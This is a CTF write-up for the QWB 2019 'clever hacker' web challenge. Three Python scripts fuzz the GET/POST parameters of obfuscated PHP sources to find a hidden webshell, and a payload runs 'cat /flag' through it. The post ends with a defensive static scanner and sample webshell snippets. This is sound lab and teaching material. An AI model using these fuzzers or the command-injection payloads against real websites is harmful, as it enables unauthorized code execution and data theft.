
[强网杯 2019] 高明的黑客 (QWB CTF 2019: The Clever Hacker)

Posted: 2020-04-06 20:58:02      Views: 399      Comments: 0      Favorites: 0


Challenge overview

The front page (the kind that gets you hauled down to the station):

[screenshot]

So first visit www.tar.gz, and sure enough it downloads:

[screenshot]

And then I was just dumbfounded…

[screenshot]

It is all bizarre stuff. Does PHP have "junk code" (花代码, obfuscating filler) too?

[screenshot]

Key point: writing a fuzzing script

These files are actually there for a reason: since you are told the site has already been hacked, something must be hidden in these sources.

So the idea is simple: pull every GET and POST parameter out of these sources, send a request for each one, and see which of them gives RCE.

Here is my script… still too noobish: it only handles GET, and it is slow as a snail:

import requests
import re
import os

path = '****'  # directory holding the extracted PHP sources
url = ''       # base URL of the target
r = re.compile(r"\$_GET\['(\w+)'\]")  # matches $_GET['XXX'] and captures the parameter name
f_list = os.listdir(path)

for file in f_list:  # read the files one by one
    with open(path + file) as f:
        con = f.read()
    tmp = r.findall(con)  # every GET parameter name used in this file
    for j in tmp:
        exp = url + file + '?' + j + '=echo fuzz;'  # build the GET URL, passing an echo as the parameter value
        res = requests.get(exp).text
        if 'fuzz' in res:  # the marker was echoed back, so this parameter reaches code execution
            print('Find ' + exp)
            exit(0)

But it does get there in the end:

[screenshot]

Build the payload directly:

/xk0SzyKwfzw.php?Efa5BVG=cat /flag

Grab the flag:

[screenshot]

Here is master 飘零's script: it uses a worker pool (multiprocessing.Pool) and is much faster (Python 2):

import requests
from multiprocessing import Pool

base_url = "http://localhost:8888/src/"
base_dir = "/Desktop/site/src/"
file_list = ['zzt4yxY_RMa.php',  # ........ (list truncated in the original post)
             'm_tgKOIy5uj.php', 'aEFo52YSPrp.php', 'Hk3aCSWcQZK.php', 'RXoiLRYSOKE.php']

def extracts(f):
    """Return the parameter names read through $_GET['...'] in file f (first occurrence per line)."""
    gets = []
    with open(base_dir + f, 'r') as fh:
        lines = [i.strip() for i in fh.readlines()]
        for line in lines:
            if line.find("$_GET['") != -1:
                start_pos = line.find("$_GET['") + len("$_GET['")
                end_pos = line.find("'", start_pos)
                gets.append(line[start_pos:end_pos])
    return gets

def exp(start, end):
    # end is clamped so the last slice does not run past the list
    for i in range(start, min(end, len(file_list))):
        filename = file_list[i]
        gets = extracts(filename)
        print "try: %s" % filename
        for get in gets:
            now_url = "%s%s?%s=%s" % (base_url, filename, get, 'echo "sky cool";')
            r = requests.get(now_url)
            if 'sky cool' in r.content:
                print now_url
                break
    print "%s~%s not found!" % (start, end)


def main():
    pool = Pool(processes=15)    # 15 worker processes
    step = len(file_list) / 15   # Python 2 integer division: the file list is cut into 15 slices
    for i in range(0, len(file_list), step):
        pool.apply_async(exp, (i, i + step,))
    pool.close()
    pool.join()


if __name__ == "__main__":
    main()

And of course there is master 赵's script, very neatly written (Python 3):

import os
import threading
from concurrent.futures.thread import ThreadPoolExecutor

import requests

session = requests.Session()

path = "/Users/jinzhao/PhpstormProjects/qwb/web2/"  # directory holding the sources
files = os.listdir(path)  # every file name in that directory

mutex = threading.Lock()
pool = ThreadPoolExecutor(max_workers=50)

def read_file(file):
    with open(os.path.join(path, file)) as f:  # open the file and read it line by line
        content = "".join(f)

    # collect every parameter read through $_GET['...'] in this page
    start = 0
    params = {}
    while content.find("$_GET['", start) != -1:
        pos2 = content.find("']", content.find("$_GET['", start) + 1)
        if pos2 == -1:  # unterminated index, stop rather than loop forever
            break
        var = content[content.find("$_GET['", start) + 7: pos2]
        start = pos2 + 1

        params[var] = 'echo("glzjin");'

    # and every parameter read through $_POST['...']
    start = 0
    data = {}
    while content.find("$_POST['", start) != -1:
        pos2 = content.find("']", content.find("$_POST['", start) + 1)
        if pos2 == -1:
            break
        var = content[content.find("$_POST['", start) + 8: pos2]
        start = pos2 + 1

        data[var] = 'echo("glzjin");'

    # eval test
    r = session.post('http://localhost:11180/web2/' + file, data=data, params=params)
    if r.text.find('glzjin') != -1:
        with mutex:
            print(file + " found!")

    # assert test: drop the trailing ';'
    for i in params:
        params[i] = params[i][:-1]

    for i in data:
        data[i] = data[i][:-1]

    r = session.post('http://localhost:11180/web2/' + file, data=data, params=params)
    if r.text.find('glzjin') != -1:
        with mutex:
            print(file + " found!")

    # system test
    for i in params:
        params[i] = 'echo glzjin'

    for i in data:
        data[i] = 'echo glzjin'

    r = session.post('http://localhost:11180/web2/' + file, data=data, params=params)
    if r.text.find('glzjin') != -1:
        with mutex:
            print(file + " found!")

for file in files:  # walk the directory
    if not os.path.isdir(os.path.join(path, file)):  # only open regular files, skip subdirectories
        pool.submit(read_file, file)

pool.shutdown(wait=True)  # wait for every queued file to be checked


I had better stop telling people I have learned Python…
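Seen from the defender's side (a site owner who has been handed the same "hacked" source tree), the same parameter extraction is more useful as a static check that never sends a request: flag the files where a $_GET/$_POST value reaches eval, assert, system or a similar sink, the three cases master 赵's script probes. This is an added example, not code from the writeup or from any of the scripts it quotes; the sample PHP files and their names are constructed, and the intra-file taint tracking is deliberately simple (one-line assignments only).

```python
import re

# A request parameter read, e.g. $_GET['abc'] or $_POST["abc"].
PARAM_RE = re.compile(r"\$_(GET|POST|REQUEST)\[['\"](\w+)['\"]\]")
# A one-line assignment: $name = <expr>;
ASSIGN_RE = re.compile(r"^\s*\$(\w+)\s*=(?!=)\s*(.+?);\s*$")
# Code-execution sinks a webshell typically feeds request input into.
SINK_RE = re.compile(r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\((.*)\)")
VAR_RE = re.compile(r"\$(\w+)")

def _origins(expr, tainted):
    """Request parameters that reach `expr`, directly or through tainted variables."""
    found = {f"$_{g}['{v}']" for g, v in PARAM_RE.findall(expr)}
    for name in VAR_RE.findall(expr):
        found |= tainted.get(name, set())
    return found

def scan_php(src):
    """Return [(line_no, sink, [origin params])] for each sink reachable from request input."""
    tainted = {}   # variable name -> set of request parameters flowing into it
    findings = []
    for no, line in enumerate(src.splitlines(), 1):
        m = ASSIGN_RE.match(line)
        if m:
            lhs, origins = m.group(1), _origins(m.group(2), tainted)
            if origins:
                tainted[lhs] = origins
            else:
                tainted.pop(lhs, None)   # overwritten with clean data
        s = SINK_RE.search(line)
        if s:
            origins = _origins(s.group(2), tainted)
            if origins:
                findings.append((no, s.group(1), sorted(origins)))
    return findings

def scan_tree(files):  # files: {filename: source}; keeps only files with findings
    return {n: h for n, h in ((n, scan_php(s)) for n, s in files.items()) if h}

# Constructed sample sources (made-up names; not the challenge's real files).
SAMPLE_FILES = {
    "decoy.php": "<?php\n$x = $_GET['abc'];\n$y = strlen($x);\necho $y;\n",
    "shell.php": "<?php\n$a = $_GET['Efa5BVG'];\n$b = 'noise';\nsystem($a);\n",
    "shell2.php": "<?php\nif (isset($_POST['cmd'])) { eval($_POST['cmd']); }\n",
}

if __name__ == "__main__":
    for name, hits in scan_tree(SAMPLE_FILES).items():
        for no, sink, origins in hits:
            print(f"{name}:{no}: {sink}() reachable from {', '.join(origins)}")
```

The decoy file reads a parameter but never passes it to a sink, so it is not reported; the other two are, with the originating parameter named so the finding can be verified by hand.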


Original post: https://www.cnblogs.com/keelongz/p/12643812.html
